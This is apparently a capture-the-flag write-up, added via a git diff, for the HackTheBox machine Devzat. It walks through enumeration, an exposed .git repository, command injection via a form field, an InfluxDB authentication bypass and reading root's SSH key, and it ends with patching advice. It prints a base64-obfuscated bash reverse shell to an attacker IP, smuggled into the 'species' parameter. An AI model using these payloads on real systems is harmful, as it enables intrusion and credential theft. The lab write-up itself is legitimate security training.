add: writeup-ctf

content/writeup-ctf/writeup-devzat-htb/index.md

@@ -0,0 +1,207 @@
+---
+title: "Writeup - Devzat (HTB)"
+date: 2022-03-15
+slug: "writeup-devzat-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Devzat](https://app.hackthebox.com/machines/Devzat) machine from  the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.11.118
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2p1)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+- 8000/tcp : SSH
+
+I add the domain to the /etc/hosts file:
+
+
+```bash
+10.10.11.118	devzat.htb
+```
+I then access the site via a browser:
+
+![](img/image-2.webp)
+
+## Exploit
+
+After looking at the site I notice that a shell command is given as an example at the bottom of the page:
+
+
+```bash
+ssh -l [user_name] devzat.htb -p 8000
+```
+This command connects to the application hosted on port 8000.
+
+![](img/image-3.webp)
+
+This application is an interactive chat with a number of commands available:
+
+![](img/image-4.webp)
+
+Nothing particular for the moment. I make a directory scan on the site. For that I use "ffuf" with the wordlist [common.txt](http://ffuf.me/wordlists).
+
+
+```bash
+ffuf -c -u http://devzat.htb/FUZZ -w Documents/commun.txt
+```
+![](img/image-5.webp)
+
+Several folders but quite classic one. Now let's scan the subdomains:
+
+
+```bash
+ffuf -c -u http://devzat.htb -w Documents/sub.txt -H "Host: FUZZ.devzat.htb" -fw 18
+```
+![](img/image-6.webp)
+
+A subdomain is found ! I add it in the /etc/hosts file then I go to the site :
+
+![](img/image-7.webp)
+
+It is a web page with a formulary to add pets. Now let's scan the folders for this subdomain.
+
+![](img/image-8.webp)
+
+This is a git project with a number of files.
+
+![](img/image-9.webp)
+
+I will download the projects with the following command:
+
+
+```bash
+wget -r -np -R "index.html*" http://pets.devzat.htb/.git
+```
+I first check the last commit to see if any files have been modified or deleted:
+
+![](img/image-10.webp)
+
+And indeed a large number of files have been deleted, so I will restore the last commit with the following command:
+
+
+```bash
+git checkout -- .
+```
+![](img/image-11.webp)
+
+Now that we have the complete tree, let's start the code analysis. Let's start with main.go.
+
+I find in this file, a function related to the loading of the character of the pet animal. This function takes as argument the species. It then executes a "sh" command which retrieves the content of one of the files contained in the "characteristics" folder. We will be able to use this function to execute some code.
+
+![](img/image-12.webp)
+
+For that I make a classic request that I intersperse with Burp.
+
+![](img/image-13.webp)
+
+Then I modify the value of "species" to insert my code. I test at first a classical reverse shell, but without success.
+
+![](img/image-14.webp)
+
+Let's try to convert our command to Base64 to ensure that there is no modification before execution on the target machine.
+
+[Reverse Shells - Pentest Book](https://pentestbook.six2dez.com/exploitation/reverse-shells)
+
+For that I use the following command to encode my reverse shell command in base64.
+
+
+```bash
+echo "bash -i >& /dev/tcp/10.10.16.2/1234 0>&1" | base64
+```
+Then I transmit the following order in the form.
+
+
+```bash
+echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yLzEyMzQgMD4mMQo=' | base64 -d | bash
+```
+Bingo, I am now connected as Patrick.
+
+![](img/image-15.webp)
+
+No change it's not this user who has the first flag. I will have to find a way to change the user. To start, I'll run the [linPeas](http://linpeas.sh) script to get an overview of the machine.
+
+The first thing that catches my attention is the number of open ports.
+
+![](img/image-16.webp)
+
+Indeed there are a number of ports open only locally on the machine. So I will do an ssh port forwarding.
+
+
+```bash
+ssh -L 8086:127.0.0.1:8086 -N patrick@10.10.11.118
+```
+I can then perform an nmap scan on my local address to identify the service running on port 8086.
+
+![](img/image-17.webp)
+
+It is the InfluxDB service in version 1.7.5 that runs on this port. Let's look for an exploit...
+
+After some research I found the CVE-2019-20933. It is an exploit that allows to get an admin access to the database without using a password. I use the following script:
+
+{{< github repo="LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933" >}}
+
+I will now be able to search for information in the different databases. At first I look for the registered users :
+
+![](img/image-19.webp)
+
+I find the user "catherine" with her password. This is a very good news, indeed it is her who has the first flag.
+
+![](img/image-20.webp)
+
+I connect with ssh, then I get the flag.
+
+## Privilege escalation
+
+In the linPeas scan result I also noticed that a "devchat" service was running with patrick rights. It looks like a test version running on port 8443 in parallel with the production version.
+
+
+```bash
+catherine@devzat:~/dev/dev$ ps aux | grep dev
+[...]
+patrick	839	0.0	0.5	1085916	11904	?	Sl	12:28	0:00	./devchat
+[...]
+```
+I also found backup files related to this same service:
+
+![](img/image-21.webp)
+
+These are files belonging to catherine, good news I will be able to recover them and analyze them to find an exploit.
+
+In the file "commands.go", I quickly find that the command /file uses a password to work. And this password is clearly indicated.
+
+![](img/image-22.webp)
+
+Ok let's try the different things we discovered.
+
+I log back in as patrick, then start a local SSH session on 8443.
+
+![](img/image-23.webp)
+
+Let's try to read a root file with the command /file and with the password found previously. I test with the file id\_rsa of the user root.
+
+![](img/image-24.webp)
+
+It works! So now I can connect as root with ssh. Then get the last flag.
+
+![](img/image-25.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not leave .git accessible on a website
+- Do not use shell commands in functions used by forms accessible on a web site
+- Do not store non-hasher passwords in a database
+- Update InfluxDB
+- Do not run the chat bot with root privileges